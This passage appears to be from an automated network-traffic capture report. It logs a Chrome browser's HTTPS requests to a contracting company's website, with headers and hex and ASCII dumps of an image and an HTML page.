                                              2024-09-27 06:20:10 UTC8000INData Raw: b0 26 d1 ba 75 45 d7 20 5f c1 86 0d db 95 ec 56 ac 45 d0 56 55 fb e4 46 db 1b 52 a7 52 15 a2 75 05 0c bb 2d 42 80 00 71 81 c4 05 0f 1e 2a 74 e8 c0 80 c1 03 11 22 34 70 50 bc 58 46 63 19 8b 39 68 90 3c 59 c3 ff 61 cb 87 1f 64 7e 40 98 33 03 c1 15 2a fc 8d 10 e1 6f e9 08 17 50 a3 26 41 62 44 eb 11 7a 61 83 08 11 a2 45 ed 16 76 61 88 ed ba 55 eb d9 b4 6c dd be 95 0a 84 38 10 1b c7 8f 3f 55 ee 64 e9 0e e7 47 67 20 45 4a 74 c6 8b a0 28 32 98 d0 a9 a0 c4 87 12 2e 5c d4 c8 91 72 c8 c7 2b 3e 0e 02 20 20 40 c0 82 14 29 94 54 91 df c5 4b 1c 3a 6e f0 a7 49 83 e6 cc 9a 30 61 b6 68 a3 8c 32 de b8 63 0f 3e f8 00 04 90 3e 04 69 b0 c1 3e 00 41 70 8f 3b de 78 c3 8c 2d b6 58 e3 8c 33 d2 50 c3 0d 39 e2 f0 c2 8b 2e c4 e0 a2 0a 24 54 50 41 89 14 59 4c 51 09 25 90 88 11 89 17
                                              Data Ascii: &uE _VEVUFRRu-Bq*t"4pPXFc9h<Yad~@3*oP&AbDzaEvaUl8?UdGg EJt(2.\r+> @)TK:nI0ah2c>>i>Ap;x-X3P9.$TPAYLQ%
                                              2024-09-27 06:20:10 UTC8000INData Raw: 82 6f f2 66 6f ff 7d a2 09 7f d2 6f fd 84 70 a7 12 8e 08 77 28 95 72 09 e0 f8 27 04 87 29 90 12 29 8d e0 2a 10 37 8f 9c b0 09 17 b7 09 0f 37 8f 1c a7 2b 84 00 2d ad b5 07 22 c7 31 6a b7 76 64 b5 1e 2b 73 1b e6 61 1b d0 11 77 ed a1 32 b2 a7 69 95 86 69 24 73 1d b3 55 90 7b 33 69 0d 39 77 d0 41 88 28 33 1d d8 61 07 6b f0 73 e0 02 37 11 d7 08 8b 82 09 c4 e4 07 f3 76 09 92 60 7b b9 d2 07 e5 a2 2d 23 37 2f 4a 55 2f 18 23 93 f1 b2 2d dd e2 51 00 39 2d 37 c9 2d ae 75 54 50 37 2d 41 35 94 d4 e2 74 26 c5 30 2a 77 76 0f 13 73 5b e0 31 db f1 55 6a 47 56 3a 97 91 0d f9 1d b8 21 07 94 66 90 58 79 1e e3 91 1b bd c1 05 c4 f1 77 f5 61 01 82 c4 38 3a 90 05 43 30 58 25 d0 66 97 a3 00 26 00 41 51 20 16 09 91 04 36 96 42 47 76 01 61 93 12 25 11 36 f4 c7 01 4d a0 59 50 d0 04
                                              Data Ascii: ofo}opw(r'))*77+-"1jvd+saw2ii$sU{3i9wA(3aks7v`{-#7/JU/#-Q9-7-uTP7-A5t&0*wvs[1UjGV:!fXywa8:C0X%f&AQ 6BGva%6MYP
                                              2024-09-27 06:20:11 UTC8000INData Raw: e3 ec 7b bb 99 30 eb ba 69 e5 cc 1d aa c7 69 c8 0d 09 8d 78 59 ec c3 ac e3 d5 cc 69 cd d8 95 15 9e bb ee 3e 48 30 1b 41 40 04 af 91 04 e6 41 7a ca b2 de cb 3b 84 b6 96 84 8b 8d 4c b0 f1 3e 65 f7 9a 4d 08 7d ed b9 fa 30 80 15 34 70 03 98 50 df ff cc e5 14 50 e6 32 32 00 d4 30 8d d3 38 0d 37 1b ef 34 b2 df 5f fd 55 60 4d ef f4 b6 5f 35 fa 65 3f d9 93 3b f1 13 2a e8 df 3d 09 f0 32 92 00 9d c8 02 03 b8 16 24 58 00 fb 1d 02 75 8c 93 12 40 01 20 5c 81 08 a8 00 06 e0 00 4e cb b4 25 b0 82 25 90 82 42 93 34 44 3b e3 2a 04 63 47 04 08 1a 3d 68 10 a4 81 03 c7 89 84 13 12 60 60 78 02 c3 84 85 46 ff 64 3c 20 c1 63 07 04 26 12 7c 0c 79 01 62 c4 12 83 27 12 44 2c 89 e1 e4 c9 04 2a 57 aa 2c 59 92 25 49 97 32 67 be 8c e9 72 25 cd 9c 37 59 ca 84 e9 53 a5 83 9d 2a 51 0e 25
                                              Data Ascii: {0iixYi>H0A@Az;L>eM}04pPP220874_U`M_5e?;*=2$Xu@ \N%%B4D;*cG=h``xFd< c&|yb'D,*W,Y%I2gr%7YS*Q%
                                              2024-09-27 06:20:11 UTC8000INData Raw: 60 07 6e 40 08 82 00 ac ba ec cb 70 82 27 24 4e ac 84 e2 4a c6 22 88 28 0e 87 bc 2a 88 7e a8 cb 50 a7 4c 90 e8 02 2e 82 4b 26 ee ab bc 04 23 be a4 e3 74 42 2d 62 e2 75 18 8a 06 30 c0 57 1a 20 ea ce 25 5d e4 e5 e8 0e cb ef 50 2b ee 8e 0e 0b a9 b0 b8 62 a9 59 ac 06 b2 4e 00 6e 68 a0 b2 46 86 8c 4e ea 88 58 30 02 f2 0a 53 5a c2 0a b4 49 e4 74 a5 01 0a c0 5b a8 ee b4 02 4f e5 5c 2b eb 6c 4b b6 46 0f ff b7 72 8b f0 0e cf c5 84 4b e0 88 4b c6 92 c5 66 6e cc 60 74 4c a2 46 a6 a3 1e c0 4f 3c 00 4c 92 af be 98 e4 06 b2 2b 0a 50 04 05 ca 87 7f fc a3 43 4c 64 07 80 60 49 e6 2a 08 4e a7 e3 9a 48 8a 2e 4f 4e 1c 51 72 4a e7 2a 82 82 50 a4 cc 50 5a 04 44 42 04 05 56 c4 16 6f 31 45 52 c4 44 72 31 45 06 0c 46 5e a4 47 7a 64 48 9c 64 05 2c 85 2a 3e cb 67 3a 65 55 12 a0 b4
                                              Data Ascii: `n@p'$NJ"(*~PL.K&#tB-bu0W %]P+bYNnhFNX0SZIt[O\+lKFrKKfn`tLFO<L+PCLd`I*NH.ONQrJ*PPZDBVo1ERDr1EF^GzdHd,*>g:eU
                                              2024-09-27 06:20:11 UTC8000INData Raw: 06 93 ab a8 12 47 b7 2c 3b 25 04 31 78 cc 62 5d 13 96 81 13 cd 5c 9b 5b 75 e5 ef e5 1e 54 51 4c b5 61 76 fc f1 15 bf 97 a4 05 d2 ad db d3 e3 7b 11 ed 18 f2 c1 1e 02 e9 ee 73 7d b2 b4 cc 18 c3 a3 fa 45 d0 38 ff 22 25 eb 9c 56 3d 82 56 3c 1a c3 54 d7 1b bf 01 14 fa cc cf 1f d5 1a fe dc 30 ee e7 83 b1 da ce 06 86 55 5a 55 30 3f ca 9e c2 3a 87 01 76 5f 39 92 a3 db d5 5d f5 77 16 6c 67 91 18 ec 16 6f a1 3d 9b c6 a9 42 90 2c 51 f0 02 7f 53 02 b2 48 04 95 e2 03 01 20 00 7f a2 04 38 cb 05 8e e2 f3 39 47 28 16 40 00 4d c3 04 f5 ea 02 1f f0 37 a7 59 93 2a 51 ed ba 6c 93 1f 18 59 73 23 82 b2 98 03 95 b5 d4 3f c7 04 59 cf 04 3f 77 04 4b cd d4 0d eb b0 b7 28 f6 63 9f b0 4e fd d4 0f 2b b1 2e 40 8c bf 6c 8c 18 ae 80 33 a0 cb 1c 7e 65 2e a1 69 15 30 e9 e7 14 2e b4 f4 23
                                              Data Ascii: G,;%1xb]\[uTQLav{s}E8"%V=V<T0UZU0?:v_9]wlgo=B,QSH 89G(@M7Y*QlYs#?Y?wK(cN+.@l3~e.i0.#


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              71192.168.2.465407173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:11 UTC424OUTGET /images/bg/14.jpg HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: */*
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: cors
                                              Sec-Fetch-Dest: empty
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:11 UTC262INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:11 GMT
                                              Server: Apache
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Last-Modified: Fri, 30 Dec 2022 22:22:48 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 165418
                                              Connection: close
                                              Content-Type: image/jpeg
                                              2024-09-27 06:20:11 UTC7930INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 1e 00 00 ff e1 03 29 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 36 2e 30 2d 63 30 30 32 20 37 39 2e 31 36 34 33 35 32 2c 20 32 30 32 30 2f 30 31 2f 33 30 2d 31 35 3a 35 30 3a 33 38 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                              Data Ascii: ExifII*Ducky)http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164352, 2020/01/30-15:50:38 "> <rdf:RDF xm
                                              2024-09-27 06:20:11 UTC8000INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 12 08 24 08 7b 13 66 8b 62 ae ad 38 be 27 bd 75 33 74 b4 e1 7a ee d0 ad 8c 95 69 c2 5b 23 27 e0 5f 67 b0 0d 6d 52 a0 ec e2 75 b4 f4 71 ea 7d c6 de 1d 3c 32 b1 35 3f 77 6e 9a f7 1b 65 4d 73 97 14 92 6d 2d 35 2a 5d cb 9d 92 ae 2a 5f 97 5b e2 8b fa d1 7f 74 0b 2a aa d3 49 b6 da dd b4 8b ac 85 34 ce e5 a7 0c 16 b2 d3 61 4d f2 dc 89 59 65 b2 c8 94 67 25 c3 0d 1f 47 69 a6 de 53 5d 18 8a ab 72 ec f2 fe b2 93 d9 3e c6 04 d2 ae e6 cd 5f 6a 70 c1 5e e5 5d 33 6b a5 b2 97 36 e6 71 87 2d cd ab 0a c4 ef aa 5e 34 be a4 7b 0e e2 83 85 49 55 b6 1c 1a 46 0b b8 f3 8b 91 c7 15 5d 0b 5e b6 66 a6 e5 d8 db 03 bb 83 64 e7 85 8f 65 eb 59 59 08 f1 27 bb 76 c6
                                              Data Ascii: @${fb8'u3tzi[#'_gmRuq}<25?wneMsm-5*]*_[t*I4aMYeg%GiS]r>_jp^]3k6q-^4{IUF]^fdeYY'v
                                              2024-09-27 06:20:11 UTC8000INData Raw: ce d9 4a 5f 43 67 72 ac 6c 7a 52 54 d5 0a d2 fb 31 4b d8 64 bd ed de 9e b3 20 39 f9 bc aa 17 4f e2 71 a6 f1 f2 96 eb 23 b9 f6 38 ee 35 55 cd 2d c7 b2 38 dc ca bf 2a 6f 75 cb 6d 6f b5 be 83 a9 25 ea 35 df 45 39 15 3a 72 20 ac 84 b7 a9 6e 03 35 38 ca 2a 51 7c 51 7b 9a da 83 7b 96 fe d3 90 f0 f3 f9 63 76 72 f9 3b f1 96 d9 e3 4f 6c b4 ea af a8 b7 85 cc f1 73 17 0c 5f 05 cb de a6 5b 25 07 da 05 b9 d7 0b 22 eb 9c 54 a3 25 a3 4d 6a 9f a0 f2 f9 9f 2e 65 72 eb a5 9f f2 f4 b8 5e ba db 85 27 e0 97 5b 4d ee 3d 57 d0 ba 48 7a ad db 7b 80 e1 f2 8f 99 68 cb 93 c7 ca 4e 8c c8 6c 9d 33 5c 2f 5f bb ae f3 b6 f8 27 17 ae d8 b3 9d cd b9 0e 17 35 8f 1d 89 d3 93 1f d3 c9 af c3 64 5f 7f 51 c6 af 98 f3 6e 43 35 47 35 87 99 8b ae 95 e6 c5 78 3b 38 fa 75 03 d2 4a 2e b5 a4 bc 75 75
                                              Data Ascii: J_CgrlzRT1Kd 9Oq#85U-8*oumo%5E9:r n58*Q|Q{{cvr;Ols_[%"T%Mj.er^'[M=WHz{hNl3\/_'5d_QnC5G5x;8uJ.uu
                                              2024-09-27 06:20:11 UTC8000INData Raw: c9 d7 72 f7 32 21 e1 b2 3f d2 02 f7 52 68 69 ae ba ad fb 3d 07 9e af 3b 99 f2 36 aa e6 b1 f8 9c 0d 74 86 64 56 da d7 47 99 d2 f5 3b d4 5f 4e 45 6a ea 26 ac 84 96 a9 a0 38 bc cf e5 ce 2c 8f e2 3c 9e df 81 e6 1b db 8f b9 6f dd 92 dd b4 72 df 99 35 bd 72 fe 73 5f c1 67 c7 67 89 fe 55 9d b0 9b de ce ee c6 ba fb 0a 9c cb 95 e0 f3 4a 3c 9c ca d4 d2 f7 67 f5 a0 fa e2 fa 00 cf 3b 25 e2 63 3b a3 1e 3e 1f a9 d7 a9 a6 ac 8f 8d 51 bf 1f 7c 52 7a 3d 9a 4b a6 2c f3 f9 75 f3 6e 47 1a e9 ca 94 b3 f9 34 66 a4 ec 8e be 7d 4a 2f 55 c7 2e 94 7a 5e 5d 93 cb f2 a8 59 18 13 84 a9 b5 f1 6b 0d 9b 5f 5a 03 6d 70 8a 72 9b 8a 52 96 9c 5a 7f 29 ae 09 45 ad 36 27 37 b3 ac dc b4 e2 96 dd af 79 aa dd 63 57 9b a6 9e 5b d7 4e b5 d8 04 cb cb aa ee 2d 38 56 8f 57 d0 c5 98 d8 f9 11 e2 92 f7
                                              Data Ascii: r2!?Rhi=;6tdVG;_NEj&8,<or5rs_ggUJ<g;%c;>Q|Rz=K,unG4f}J/U.z^]Yk_ZmprRZ)E6'7ycW[N-8VW
                                              2024-09-27 06:20:11 UTC8000INData Raw: 0a 16 5f 27 ef e6 d9 26 fe ad 11 52 46 31 a2 ab 1f e5 61 ce e9 bf af 7b 70 3b 55 e3 d1 57 e9 d7 18 77 2d 0c db d3 f9 c0 e6 d5 8b 9e d2 82 85 78 91 5d 35 f8 df fc c5 8b 6a 9d 78 57 46 cb 1d af 82 5b 5a d3 a3 b0 b6 b7 1a 72 ff 00 75 bb f0 4b d8 07 32 6f 4c 0e 5f 27 d0 e3 af a8 e8 ca 5f b4 d3 af 4c 59 cd bb fd af 09 f5 70 97 ec 7a 64 e3 f6 c4 08 c4 b1 cf 22 e8 bf aa cd d5 49 bb ad 8b 7a e8 d6 9d 85 6c 2f df 72 17 69 62 94 d6 45 cf a1 e9 a0 13 09 37 91 25 a6 ce 11 91 5c a6 a2 a3 d1 24 d9 30 d3 cf 97 71 9c e5 a2 5d e0 4b dc d2 ea 35 e3 7e 8c 7b df b4 d8 f7 3e e3 5e 3a d2 94 9f 5b f6 81 b5 98 c5 ea b6 19 11 1d 8b 40 1a 2d 75 24 88 f4 92 04 80 00 80 1f 59 8a 9a 93 d0 0c c0 00 00 00 00 00 08 24 80 28 66 fe fb 86 fe f4 bd 85 f2 86 77 ef 98 7f 8a 5e c2 f8 02 8f 3c
                                              Data Ascii: _'&RF1a{p;UWw-x]5jxWF[ZruK2oL_'_LYpzd"Izl/ribE7%\$0q]K5~{>^:[@-u$Y$(fw^<
                                              2024-09-27 06:20:11 UTC8000INData Raw: 1d 62 a7 f5 ac 6a 7a 7a 10 fe 0f 99 91 2d 73 f3 25 35 f6 69 d6 b0 2e df cc b0 71 f5 f3 af ae 12 5d 1a ed 28 cf e6 0a e5 e1 c5 c6 ba f9 74 49 47 c1 eb 2c d1 c9 39 75 0b f4 95 8d f4 db e3 7f 49 76 10 84 23 c1 08 a8 c5 74 45 68 80 e3 b9 7c c7 94 b4 e0 ab 16 b9 6e 9a 6d d8 bd 0c 7f db d2 b9 a7 cc 33 2d ca 5f 61 ec 5f 41 d9 27 a0 0a 38 9c a3 96 e1 bf d9 f1 d4 5f 5b db ed 2e a4 a3 bb 62 ea 44 f4 0e 80 1b 37 86 68 bb 37 0e 88 b9 5b 74 22 96 fd 64 8e 5d df 35 f2 c5 e0 c6 72 c9 b3 72 84 22 ff 00 b5 b8 0e d6 cd 74 d4 9e 9d 19 e7 df 32 f9 8b 2d 7e cb 81 f0 a9 ee b6 d6 a5 f4 10 f9 47 3c cb d3 f8 8f 30 8c 61 f6 29 8b 84 b4 ef 03 b3 91 9d 87 8b fb cd f0 ab f1 34 8e 6d df 34 f2 d8 4b 83 1e 33 cc 97 f9 11 e3 23 1f e5 7e 51 5c b8 a7 e6 64 4b fc e9 b9 ff 00 68 e9 d1 87 8f
                                              Data Ascii: bjzz-s%5i.q](tIG,9uIv#tEh|nm3-_a_A'8_[.bD7h7[t"d]5rr"t2-~G<0a)4m4K3#~Q\dKh
                                              2024-09-27 06:20:11 UTC8000INData Raw: 96 1d 75 ce 4a 6b 8b 8d b5 c3 1e 97 b0 e8 db 52 b1 29 27 a4 e3 b6 2f b4 e6 ac bb a7 e6 61 66 fe 5d c9 f8 2c 5b 23 38 f5 ea 05 dc 77 63 ae 3a 49 4f 67 8b 5e 87 d3 a7 61 a6 5c b6 97 0b a3 53 95 72 bd 69 29 47 7a d4 ad 91 4e 5e 0d 7e 76 0a 73 94 b6 49 4b 6a 66 78 fc f6 85 3f 86 c9 d6 39 7a 6d 8c 53 6a 5d cd 01 5e ef 97 e9 f2 68 84 ad 94 a7 4c bc 11 6f 64 df 49 b9 55 18 dd 97 45 69 46 a8 54 d2 4b 72 6d 1b b2 73 b1 f0 aa 79 d9 cf 82 2b dc 86 f7 de 91 4b 0f 36 bc ec 4c dc ba 75 e1 ba 49 24 d6 8d 2d 34 03 6f 25 aa b8 50 b0 ef 8a 9d f5 eb 64 78 97 44 ba 51 75 60 61 ab d5 de 5a 85 c9 38 a6 ba 99 a2 78 d9 33 58 b9 38 cd 29 d5 14 a7 17 f5 d6 9d 66 c8 67 3f 3a 74 df 5b 8c a3 b5 49 2d 50 17 92 8c 56 c5 b8 c6 37 57 39 4a 11 92 72 86 c6 56 59 38 ea b9 5b 05 29 47 73 df
                                              Data Ascii: uJkR)'/af],[#8wc:IOg^a\Sri)GzN^~vsIKjfx?9zmSj]^hLodIUEiFTKrmsy+K6LuI$-4o%PdxDQu`aZ8x3X8)fg?:t[I-PV7W9JrVY8[)Gs
                                              2024-09-27 06:20:11 UTC8000INData Raw: 74 7f 4e 4f 4a 9f 60 1d 32 48 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 04 90 00 00 00 00 00 00 00 00 00 00 00 12 00 80 00 00 09 02 01 24 00 00 00 00 00 00 01 20 80 04 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 86 68 be ab 1e ae 97 c2 e5 ef 33 7b 23 b4 0d 55 d9 17 18 a9 3f 12 7a 2e b6 d1 a7 32 bb 97 0d b8 da 2b 13 5c 4b ae 3d 24 e4 62 ca 76 c2 50 f7 53 d7 ab 47 d6 25 97 3a f4 5c 3c 4d 3e 1b 1e e6 bb 74 e9 03 75 77 57 6b e1 52 4e 49 78 97 4a 66 cd 8f f9 8e 7d be 4a 4d e2 cd 46 eb 1e fe 89 3e ad 4c a7 fc 45 4e af 2d a9 42 2b f3 65 a6 9c 4f b8 0b db 37 f5 74 9c be
                                              Data Ascii: tNOJ`2H$$ h3{#U?z.2+\K=$bvPSG%:\<M>tuwWkRNIxJf}JMF>LEN-B+eO7t
                                              2024-09-27 06:20:11 UTC8000INData Raw: 7d 5b 00 bf dc f7 6f 5d 04 2d ef 7f a4 a3 9b 39 ba 54 2d 4e 32 4f 57 c3 f5 97 a0 ca 2b 3a ae 19 57 a5 f5 34 b4 83 f0 b8 fa 40 db 5e 76 25 b6 4a a8 db 17 38 cb 4e 1e 95 22 ad b9 79 f5 73 09 56 ab 8c f1 9a 4e 29 7b ef af 42 ae b4 f9 d7 c7 2a b8 c3 1d f8 e7 28 bd 26 a7 d4 b4 da 61 8f 2c 78 ca 59 33 9c aa 86 22 7c 11 93 6e 52 52 dd bc 09 e6 53 c7 c8 c9 c6 be 53 9d 52 e2 e0 94 56 c7 0e d6 6f a6 ac e9 73 0a eb c9 8f 1d 14 46 4e 37 f5 f1 6e 2c ac bc 7c 8c 58 5f 08 29 4a d5 b2 2d 2d 76 f5 f5 12 bc da dc 31 54 9c b8 f5 71 96 fd 9d 29 b0 26 ab 14 61 91 1a 9b b2 71 d5 ea fa 4a 5c 93 94 df 4e 2d 9f c4 25 e6 d9 6c dc d4 5e e8 ad 76 17 66 d6 3d 91 72 5c 35 ee 4d 6f 94 86 5d d2 72 84 61 2d 22 9a 76 3f 62 02 d3 94 2b 8a 4d f0 a5 b1 18 5a f8 e4 aa 4f de da fb 8d 36 c6 56
                                              Data Ascii: }[o]-9T-N2OW+:W4@^v%J8N"ysVN){B*(&a,xY3"|nRRSSRVosFN7n,|X_)J--v1Tq)&aqJ\N-%l^vf=r\5Mo]ra-"v?b+MZO6V
                                              2024-09-27 06:20:11 UTC8000INData Raw: 6d b6 ab 2e 8c 78 63 18 c5 3d 78 65 bc c2 35 5b 3a a3 64 ed 6e 2d 71 6b d4 99 ae ba a3 38 b9 3d 52 52 d2 2d b6 b8 d7 58 19 55 8f 93 4d f6 49 db 15 4c 96 90 ad 74 19 eb 5c 61 e5 bb 78 5e 9b 5b f7 8d 11 78 52 8c fc 9e 29 f0 3d 14 35 7a f1 33 28 46 b5 6a 84 e2 a2 a3 1f 1b de f8 be ca 03 28 4b 0e a8 70 2b db 4b a3 a0 c9 df 8f ae c7 29 6c dc b7 1a b1 fc eb 72 27 6a 5a 53 ba 34 ca 3a 6e e9 d4 bb 1a 92 fa aa 31 5d 1f f1 02 b2 be a4 b4 86 3c dc 7b 3a 4c 67 74 1c 54 a5 8a f4 5b b5 5b 62 5d 94 a8 8f bd 28 c7 d3 a1 aa eb b0 67 5c aa b6 ea f8 65 b1 ae 34 bf 94 0d 0a ec b7 14 e1 08 c5 fd 55 a6 f4 25 6f 31 51 6f 8a a4 a2 b5 72 db b0 c3 27 99 61 63 d0 e1 1b e0 9a 5a 41 41 a9 bd 0a 96 73 5e 5f 6e 32 84 ec 97 93 a7 e6 f0 af 14 a5 d4 06 da f2 6f ca ae 76 55 76 b0 af 64 a3
                                              Data Ascii: m.xc=xe5[:dn-qk8=RR-XUMILt\ax^[xR)=5z3(Fj(Kp+K)lr'jZS4:n1]<{:LgtT[[b](g\e4U%o1Qor'acZAAs^_n2ovUvd


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              72192.168.2.465409173.231.215.1184436228C:\Program Files\Google\Chrome\Application\chrome.exe
                                              TimestampBytes transferredDirectionData
                                              2024-09-27 06:20:12 UTC715OUTGET /projects HTTP/1.1
                                              Host: www.citydiamondcontracting.com
                                              Connection: keep-alive
                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                              sec-ch-ua-mobile: ?0
                                              sec-ch-ua-platform: "Windows"
                                              Upgrade-Insecure-Requests: 1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Sec-Fetch-Site: none
                                              Sec-Fetch-Mode: navigate
                                              Sec-Fetch-Dest: document
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Cookie: advanced-frontend=6hukji9m9k72lj8og62vhac8h0
                                              2024-09-27 06:20:13 UTC389INHTTP/1.1 200 OK
                                              Date: Fri, 27 Sep 2024 06:20:12 GMT
                                              Server: Apache
                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                              Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                              Pragma: no-cache
                                              Access-Control-Allow-Credentials: true
                                              Content-Security-Policy: upgrade-insecure-requests;
                                              Connection: close
                                              Transfer-Encoding: chunked
                                              Content-Type: text/html; charset=UTF-8
                                              2024-09-27 06:20:13 UTC7803INData Raw: 32 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 21 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 20 62 61 73 69 63 20 20 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 2d 2d 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 43 69 74 79 20 44 69 61 6d 6f 6e 64 20 43 6f 6e 74 72 61 63 74 69 6e 67 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 0d 0a 20 20 20 20 20 20 20 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76
                                              Data Ascii: 2000<!DOCTYPE HTML><html lang="en"><head> ...=============== basic ===============--> <meta charset="UTF-8"> <title>City Diamond Contracting</title> <meta name="viewport" content="width=dev
                                              2024-09-27 06:20:13 UTC395INData Raw: 32 42 45 59 48 62 75 38 68 77 4b 59 65 79 37 2b 62 79 72 62 38 6c 56 6f 58 39 34 47 4a 35 76 38 7a 52 41 47 41 69 4c 68 30 41 37 43 6b 35 32 73 30 41 76 74 67 54 36 4d 68 44 51 59 75 38 6c 6a 2b 56 38 42 68 4e 66 79 38 6a 2f 33 2f 43 67 41 79 52 41 47 41 69 4c 68 79 50 4c 42 54 51 74 65 35 4b 33 52 6a 67 61 75 41 58 68 37 4c 50 78 6a 34 74 6f 61 66 64 37 30 41 38 42 73 71 33 34 55 67 45 56 4d 41 49 43 49 75 72 41 65 63 6e 38 42 31 4c 73 57 4f 39 67 31 74 58 32 7a 39 67 53 39 58 59 79 63 6d 56 71 73 50 73 49 62 6a 4f 6a 32 4a 6a 76 2f 4e 46 41 55 41 49 6c 4b 72 42 59 44 62 67 59 36 65 72 33 4d 6e 34 55 37 32 4b 7a 55 51 76 30 48 49 52 39 67 6f 52 79 30 32 78 6b 35 65 64 45 6e 44 2f 78 6d 6a 41 45 42 45 61 6c 45 50 33 49 7a 4e 68 2f 76 30 4c 50 42 4c 34 6e
                                              Data Ascii: 2BEYHbu8hwKYey7+byrb8lVoX94GJ5v8zRAGAiLh0A7Ck52s0AvtgT6MhDQYu8lj+V8BhNfy8j/3/CgAyRAGAiLhyPLBTQte5K3RjgauAXh7LPxj4toafd70A8Bsq34UgEVMAICIurAecn8B1LsWO9g1tX2z9gS9XYycmVqsPsIbjOj2Jjv/NFAUAIlKrBYDbgY6er3Mn4U72KzUQv0HIR9goRy02xk5edEnD/xmjAEBEalEP3IzNh/v0LPBL4n
                                              2024-09-27 06:20:13 UTC2INData Raw: 0d 0a
                                              Data Ascii:
                                              2024-09-27 06:20:13 UTC8192INData Raw: 32 30 30 30 0d 0a 48 37 47 54 49 54 65 39 71 4f 35 63 6e 7a 7a 39 68 36 42 78 39 2b 77 72 59 32 75 6b 69 79 6f 2b 31 2f 55 68 59 46 41 43 4a 53 71 51 37 41 50 34 45 42 6e 71 39 7a 41 76 42 79 36 4d 59 57 62 49 32 64 78 4f 66 4c 36 63 44 62 6a 73 70 79 50 66 7a 66 67 49 37 2f 7a 53 51 46 41 43 4a 53 71 54 38 41 47 33 71 2b 78 75 33 41 58 30 49 33 74 4b 41 72 66 6f 66 2b 58 77 59 75 63 56 52 57 48 65 34 7a 45 37 35 47 48 46 4d 77 34 70 67 43 41 42 47 70 78 48 62 41 53 5a 36 76 4d 51 5a 4c 67 68 4f 4c 6b 34 47 6c 50 4a 55 39 71 39 44 57 42 6b 66 6c 72 51 72 4d 37 37 69 4f 4f 76 30 76 6f 78 51 41 69 45 69 35 42 67 4d 33 59 6b 2b 5a 76 6b 7a 44 6a 76 59 4e 65 62 70 66 71 61 57 41 33 33 6f 73 2f 33 7a 67 4c 59 66 6c 61 66 75 66 6c 45 30 42 67 49 69 55 36 79 72
